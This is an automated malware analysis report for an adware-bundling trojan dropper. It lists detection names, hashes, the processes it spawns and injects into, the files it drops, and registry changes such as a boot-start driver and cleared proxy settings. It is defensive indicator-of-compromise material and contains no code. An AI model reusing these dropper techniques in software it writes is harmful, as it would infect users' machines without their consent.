Gen.Variant.Application.Razy.62899_25061c58cd

by malwarelabrobot on May 31st, 2017 in Malware Descriptions.

Gen:Variant.Application.Razy.62899 (BitDefender), not-a-virus:HEUR:AdWare.Win32.Sokuxuan.gen (Kaspersky), Adware.Win32.Sokuxuan (VIPRE), Gen:Variant.Application.Razy.62899 (B) (Emsisoft), Adware-Elex-FGV (McAfee), Trojan.Gen.2 (Symantec), PUA.Eszjuxuan (Ikarus), Gen:Variant.Application.Razy (FSecure), Win32/DH{TiRX?} (AVG), Gen:Variant.Application.Razy.62899 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: 25061c58cd4d24822e6f155588e81efd
SHA1: 7bbe6dec2b49fd4f14e8c301b248b385f39f7dc3
SHA256: 1a8c28b0d96a012177bdbe95c33858adc935507e56a43f709167d1cfb5115b5f
SSDeep: 24576:06KDRBwFhi8opVTOQeTRE O9IQJSRYLgtvkHI2KxYLd75MqhSIBFAH/Hu9U:06KDRSFhsOQt9IQSYLgm4xY9kIB6fIU
Size: 1731072 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2017-05-16 10:54:37
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

setup.3.15.exe:3396
MaohaWifiSvr.exe:3768
MaohaWifiSvr.exe:632
MaoHaWiFiSetup_265.exe:3544
%original file name%.exe:2624

The Trojan injects its code into the following process(es):

UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe:3920

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process setup.3.15.exe:3396 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\mgdisk\mgdisk.ssf (2866 bytes)
%Program Files%\mgdisk\x64\cryptfd.sys (7424 bytes)
%Program Files%\mgdisk\mgdinst.dll (17121 bytes)
%Program Files%\mgdisk\uninst.exe (5573 bytes)
%Program Files%\mgdisk\sqlite3.dll (17369 bytes)
C:\Windows\System32\drivers\cryptfd.sys (6360 bytes)
%Program Files%\mgdisk\sciter32.dll (94241 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\mgdinst.dll (34242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\System.dll (23 bytes)
C:\Users\Public\Documents\XMUpdate\conf.db (507 bytes)
%Program Files%\mgdisk\mgdisk.exe (8126 bytes)
%Program Files%\mgdisk\inst.db (7 bytes)
C:\Users\Public\Desktop\magicdisk.lnk (937 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk\uninstall magicdisk.lnk (955 bytes)
%Program Files%\mgdisk\zlib.dll (925 bytes)
%Program Files%\mgdisk\x86\cryptfd.sys (6784 bytes)
%Program Files%\mgdisk\mgdisk.db3 (3 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\mgdisk\magicdisk.lnk (955 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp (0 bytes)
%Program Files%\mgdisk\x64\cryptfd.sys (0 bytes)
%Program Files%\mgdisk\x86\cryptfd.sys (0 bytes)
%Program Files%\mgdisk\x86 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\System.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsy89C8.tmp (0 bytes)
%Program Files%\mgdisk\x64 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsn89D8.tmp\mgdinst.dll (0 bytes)

The process MaohaWifiSvr.exe:632 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE (684 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\ECF3006D44DA211141391220EE5049F4 (42 bytes)
C:\Windows\Temp\CabDD63.tmp (48 bytes)
C:\Windows\Temp\TarDD64.tmp (2712 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\ECF3006D44DA211141391220EE5049F4 (412 bytes)
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE (1 bytes)

The Trojan deletes the following file(s):

C:\Windows\Temp\TarDD64.tmp (0 bytes)
C:\Windows\Temp\CabDD63.tmp (0 bytes)

The process MaoHaWiFiSetup_265.exe:3544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Program Files%\Maoha\MaohaAP\gzipdll.dll (306 bytes)
%Program Files%\Maoha\MaohaAP\APDefault.ini (2 bytes)
%Program Files%\Maoha\MaohaAP\WifiDhcpSvr.dll (214 bytes)
C:\Users\"%CurrentUserName%"\Desktop\MaohaWiFi.lnk (1 bytes)
%Program Files%\Maoha\MaohaAP\driver\maohawifipronat64.cat (14 bytes)
%Program Files%\Maoha\MaohaAP\welcome\img\app_tj.png (723 bytes)
%Program Files%\Maoha\MaohaAP\ICSDHCP.ini (28 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (52 bytes)
%Program Files%\Maoha\MaohaAP\Uninst.dar0 (1 bytes)
%Program Files%\Maoha\MaohaAP\MaohaWifiWin7.dll (264 bytes)
%Program Files%\Maoha\MaohaAP\welcome\img\logo.png (17 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75CD.tmp (51 bytes)
%Program Files%\Maoha\MaohaAP\driver\WifiProNat64.inf (3 bytes)
%Program Files%\Maoha\MaohaAP\driver\MaohaWifiProNat64.sys (43 bytes)
%Program Files%\Maoha\MaohaAP\driver\MaohaWifiProNat.sys (38 bytes)
%Program Files%\Maoha\MaohaAP\MaohaDevMng.dll (195 bytes)
%Program Files%\Maoha\MaohaAP\Reg\RasMan_XP.bat (24 bytes)
%Program Files%\Maoha\MaohaAP\driver\DriverInstall_X64.exe (115 bytes)
%Program Files%\Maoha\MaohaAP\RaWifi.dll (185 bytes)
%Program Files%\Maoha\MaohaAP\Reg\RasMan_XP.reg (15 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75BB.tmp (51 bytes)
%Program Files%\Maoha\MaohaAP\driver\WifiProNat.inf (3 bytes)
%Program Files%\Maoha\MaohaAP\ICSDHCP.dll (618 bytes)
%Program Files%\Maoha\MaohaAP\res\support.dat (35 bytes)
%Program Files%\Maoha\MaohaAP\7z.dll (921 bytes)
%Program Files%\Maoha\MaohaAP\maohasubstat.dll (162 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab8B71.tmp (52 bytes)
%Program Files%\Maoha\MaohaAP\Updater\MaohaWiFiUpg.exe (538 bytes)
%Program Files%\Maoha\MaohaAP\drv64\drv64.exe (194 bytes)
%Program Files%\Maoha\MaohaAP\Reg\RasMan_WIN7.bat (26 bytes)
%Program Files%\Maoha\MaohaAP\dt.exe (13 bytes)
%Program Files%\Maoha\MaohaAP\uninstall.dll (598 bytes)
%Program Files%\Maoha\MaohaAP\ext\5.dll (27 bytes)
%Program Files%\Maoha\MaohaAP\MaohaWifiBase.dll (287 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\MaohaWiFi.lnk (1 bytes)
%Program Files%\Maoha\MaohaAP\MaoHaCD.dll (50 bytes)
%Program Files%\Maoha\MaohaAP\maohawificfg.ini (60 bytes)
%Program Files%\Maoha\MaohaAP\MyTheme.dll (134 bytes)
%Program Files%\Maoha\MaohaAP\Updater\CheckUpdate.dll (256 bytes)
%Program Files%\Maoha\MaohaAP\ResLoader.dll (112 bytes)
%Program Files%\Maoha\MaohaAP\ext\6.dll (70 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar8B72.tmp (2712 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\卸载MaohaWiFi.lnk (1 bytes)
%Program Files%\Maoha\MaohaAP\welcome\index.html (6 bytes)
%Program Files%\Maoha\MaohaAP\ext\3.dll (19 bytes)
%Program Files%\Maoha\MaohaAP\MaohaWifiSvr.exe (168 bytes)
%Program Files%\Maoha\MaohaAP\Reg\RasMan_WIN7.reg (16 bytes)
%Program Files%\Maoha\MaohaAP\tipsdll.dll (237 bytes)
%Program Files%\Maoha\MaohaAP\WifiHelp64.exe (71 bytes)
%Program Files%\Maoha\MaohaAP\pcidetect.dll (238 bytes)
%Program Files%\Maoha\MaohaAP\welcome\img\litlogo.png (1 bytes)
%Program Files%\Maoha\MaohaAP\drv64\DIFxAPI.dll (519 bytes)
%Program Files%\Maoha\MaohaAP\softconfig.dll (1595 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75BC.tmp (2712 bytes)
%Program Files%\Maoha\MaohaAP\welcome\img\app_logo.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (1720 bytes)
%Program Files%\Maoha\MaohaAP\SmartAction.dll (426 bytes)
%Program Files%\Maoha\MaohaAP\RaAPAPI.dll (1 bytes)
%Program Files%\Maoha\MaohaAP\MaohaWifiXP.dll (157 bytes)
%Program Files%\Maoha\MaohaAP\res\MaohaWiFiDir.ico (226 bytes)
%Program Files%\Maoha\MaohaAP\Uninst.dar1 (18 bytes)
%Program Files%\Maoha\MaohaAP\MaoHaWiFiNet.sys (618 bytes)
%Program Files%\Maoha\MaohaAP\driver\DriverTool.dll (112 bytes)
%Program Files%\Maoha\MaohaAP\driver\DriverInstall.exe (101 bytes)
%Program Files%\Maoha\MaohaAP\YunExplorer.exe (680 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75CE.tmp (2712 bytes)
%Program Files%\Maoha\MaohaAP\MaoHaWiFiNet64.sys (1 bytes)
%Program Files%\Maoha\MaohaAP\ApSetting.ini (487 bytes)
%Program Files%\Maoha\MaohaAP\tips.exe (569 bytes)
%Program Files%\Maoha\MaohaAP\DIFxAPI.dll (323 bytes)
%Program Files%\Maoha\MaohaAP\res\MaohaWiFi.ico (226 bytes)
%Program Files%\Maoha\MaohaAP\SkinBase.dll (125 bytes)
%Program Files%\Maoha\MaohaAP\PhonetypeData.dat (24 bytes)
%Program Files%\Maoha\MaohaAP\MaohaWiFi.exe (50 bytes)
%Program Files%\Maoha\MaohaAP\res\Skin\Skin.rdb (260 bytes)
%Program Files%\Maoha\MaohaAP\welcome\img\info.png (9 bytes)
%Program Files%\Maoha\MaohaAP\Uninstall.exe (1399 bytes)
%Program Files%\Maoha\MaohaAP\ext\1.dll (23 bytes)
%Program Files%\Maoha\MaohaAP\HWID.ini (11 bytes)
%Program Files%\Maoha\MaohaAP\ext\4.dll (18 bytes)
%Program Files%\Maoha\MaohaAP\pcid.dll (244 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\MaohaWiFi.lnk (1 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75CE.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar8B72.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75CD.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Tar75BC.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab75BB.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Cab8B71.tmp (0 bytes)

The process UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe:3920 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\chrome.7z (996985 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Bin\ChannelU.dll (26364175 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\aavc.ini (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\chrome.packed.7z (59963 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\UCBrowserSetup.exe (70898 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\config.ini (195 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\Package\7z.dll (1841 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\UCChannel\config.ini (0 bytes)

The process %original file name%.exe:2624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26515\MaoHaWiFiSetup_265.exe (1167614 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\tmp2624aaaaaa (3172 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26512\UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe (81695 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26548\setup.3.15.exe (425601 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26515\MaoHaWiFiSetup_265.exe (0 bytes)
C:\Users\"%CurrentUserName%"\Desktop\MaohaWiFi.lnk (0 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\26548\setup.3.15.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\MaohaWiFi.lnk (0 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\MaohaWiFi.lnk (0 bytes)
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MaohaWiFi\卸载MaohaWiFi.lnk (0 bytes)

Registry activity

The process setup.3.15.exe:3396 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}]
"UninstallString" = "%Program Files%\mgdisk\uninst.exe"

[HKLM\System\CurrentControlSet\services\cryptfd]
"Group" = "PNP_TDI"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}]
"DisplayName" = "magicdisk"

[HKLM\System\CurrentControlSet\services\cryptfd\Parameters]
"2959875004" = "E4 CD 69 0C 8E 09 AB 75 05 3E 32 A9 20 E7 BE DB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}]
"InstallLocation" = "%Program Files%\mgdisk"

[HKLM\System\CurrentControlSet\services\cryptfd]
"Start" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E4594B8F-F580-4EF7-8787-4A4FF7AE4A8A}]
"DisplayIcon" = "%Program Files%\mgdisk\mgdisk.exe"

The process MaohaWifiSvr.exe:3768 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\C:\Users\"%CurrentUserName%"\AppData\Local\IconCache.db,"

The process MaohaWifiSvr.exe:632 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKU\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

The process MaoHaWiFiSetup_265.exe:3544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"URLInfoAbout" = "http://www.maohawifi.com/"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Maoha\MaohaAP]
"Version" = "100080010"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"UninstallString" = "%Program Files%\Maoha\MaohaAP\Uninstall.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"Publisher" = "深圳市猫哈网络科技发展有限公司"
"EstimatedSize" = "11514"

[HKLM\SOFTWARE\Maoha\MaohaAP]
"AppPath" = "%Program Files%\Maoha\MaohaAP"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"DisplayVersion" = "1.0.8.10"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"HelpLink" = "http://www.maohawifi.com/"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"EnableConsoleTracing" = "0"

[HKCU\Software\Maoha\MaohaAP]
"AppPath" = "%Program Files%\Maoha\MaohaAP"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"DisplayIcon" = "%Program Files%\Maoha\MaohaAP\MaohaWiFi.exe"

[HKCU\Software\Maoha\MaohaAP]
"UnionID" = "265"

[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"NoModify" = "1"
"InstallLocation" = "%Program Files%\Maoha\MaohaAP"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 40 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"DisplayName" = "MaohaWiFi"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Maoha\MaohaAP]
"Version" = "100080010"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"InstallDate" = "20170530"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASMANCS]
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MaohaAP]
"NoRepair" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Maoha\MaohaAP]
"UnionID" = "265"

[HKLM\SOFTWARE\Microsoft\Tracing\MaoHaWiFiSetup_265_RASMANCS]
"EnableFileTracing" = "0"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process UCBrowser_V6.1.2107.204_4043_(Build1703071827)_ChannelU_03081433.exe:3920 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASMANCS]
"MaxFileSize" = "1048576"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASMANCS]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASMANCS]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3F 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\UCBrowser_V6_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process %original file name%.exe:2624 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASMANCS]
"EnableFileTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASMANCS]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASMANCS]
"ConsoleTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\25061c58cd4d24822e6f155588e81efd_RASAPI32]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

Dropped PE files

MD5 File path
20e131fa17e8605d2484628420525c2a c:\Program Files\Maoha\MaohaAP\7z.dll
cf73c3a03582408d422d4f7a01190d00 c:\Program Files\Maoha\MaohaAP\DIFxAPI.dll
24d6f19ca07a2ac3bfd6ff1ab3896b85 c:\Program Files\Maoha\MaohaAP\ICSDHCP.dll
8dd69fb54e5c29e07b8725c3c19ccfbd c:\Program Files\Maoha\MaohaAP\MaoHaCD.dll
c610588fa9f5065f19d735cc72ad351a c:\Program Files\Maoha\MaohaAP\MaoHaWiFiNet.sys
292f9a2632605d6591e0ea6ed62b6726 c:\Program Files\Maoha\MaohaAP\MaoHaWiFiNet64.sys
82bfea273392f5fcb0f19fe1e62a4440 c:\Program Files\Maoha\MaohaAP\MaohaDevMng.dll
bde7beffd77d80bfbfd47399ba467e49 c:\Program Files\Maoha\MaohaAP\MaohaWiFi.exe
d83716a9bb89a83d1089cf7c5ef231e2 c:\Program Files\Maoha\MaohaAP\MaohaWifiBase.dll
993921373facaef60cb9f9e84aab8301 c:\Program Files\Maoha\MaohaAP\MaohaWifiSvr.exe
c23979c42db65b1d10e733e50ba90bd3 c:\Program Files\Maoha\MaohaAP\MaohaWifiWin7.dll
d3006eb32933300b7da1b121b74b7ce5 c:\Program Files\Maoha\MaohaAP\MaohaWifiXP.dll
cd4d3d1cfdce0becb435a970b8e6a576 c:\Program Files\Maoha\MaohaAP\MyTheme.dll
41fbc54be444b267ad13711b20cbe6e5 c:\Program Files\Maoha\MaohaAP\RaAPAPI.dll
1877c1fc206cc00f602f268c97217291 c:\Program Files\Maoha\MaohaAP\RaWifi.dll
14c49377642096f9a6d7f3dfc00044f2 c:\Program Files\Maoha\MaohaAP\ResLoader.dll
491c3dfceb37cde6fd0086ef5fc225fb c:\Program Files\Maoha\MaohaAP\SkinBase.dll
c1dd873243befea71d0dc939f38f5afd c:\Program Files\Maoha\MaohaAP\SmartAction.dll
53924a7da2fd9056b71b1dea9a35fb1c c:\Program Files\Maoha\MaohaAP\Uninstall.exe
e1ecdad5c7ff885de6f241437e7a44f9 c:\Program Files\Maoha\MaohaAP\Updater\CheckUpdate.dll
9b6e41d5fd9c63c709bda83c0359b7f9 c:\Program Files\Maoha\MaohaAP\Updater\MaohaWiFiUpg.exe
0f43af2015ee8f94e9b7061cedc8783d c:\Program Files\Maoha\MaohaAP\WifiDhcpSvr.dll
22c9997dcf3d23ede6dbe1ed6a3b0af1 c:\Program Files\Maoha\MaohaAP\WifiHelp64.exe
540a232e81e4e5d67c215af689515e3b c:\Program Files\Maoha\MaohaAP\YunExplorer.exe
072f2457e70e081384edd61c821c419b c:\Program Files\Maoha\MaohaAP\driver\DriverInstall.exe
0f43a42e493fbfdee5f8bd0999c3af20 c:\Program Files\Maoha\MaohaAP\driver\DriverInstall_X64.exe
ef7f7d21d627753e4148bc1724b4d639 c:\Program Files\Maoha\MaohaAP\driver\DriverTool.dll
2b903da63c57da124f22e1e79ccec479 c:\Program Files\Maoha\MaohaAP\driver\MaohaWifiProNat.sys
b8f760633541da35bcff7087e710bcb4 c:\Program Files\Maoha\MaohaAP\driver\MaohaWifiProNat64.sys
1a2e5109c2bb5c68d499e17b83acb73a c:\Program Files\Maoha\MaohaAP\drv64\DIFxAPI.dll
2fb4b755ba2e98ca459d420d34b3e3d7 c:\Program Files\Maoha\MaohaAP\drv64\drv64.exe
a3f1268c29c18452fa7aa902642710d3 c:\Program Files\Maoha\MaohaAP\dt.exe
cadb1a29c7863c1ddbec3e309741d915 c:\Program Files\Maoha\MaohaAP\ext\1.dll
a9b884aae19f1785fd51382809fded7f c:\Program Files\Maoha\MaohaAP\ext\3.dll
5d53b78f8d73e81d162d62876e4bd1cc c:\Program Files\Maoha\MaohaAP\ext\4.dll
dbb04e987b4a6b620bf1664b96db616e c:\Program Files\Maoha\MaohaAP\ext\5.dll
1f0f865b1fea713bb9dc480c7c786197 c:\Program Files\Maoha\MaohaAP\ext\6.dll
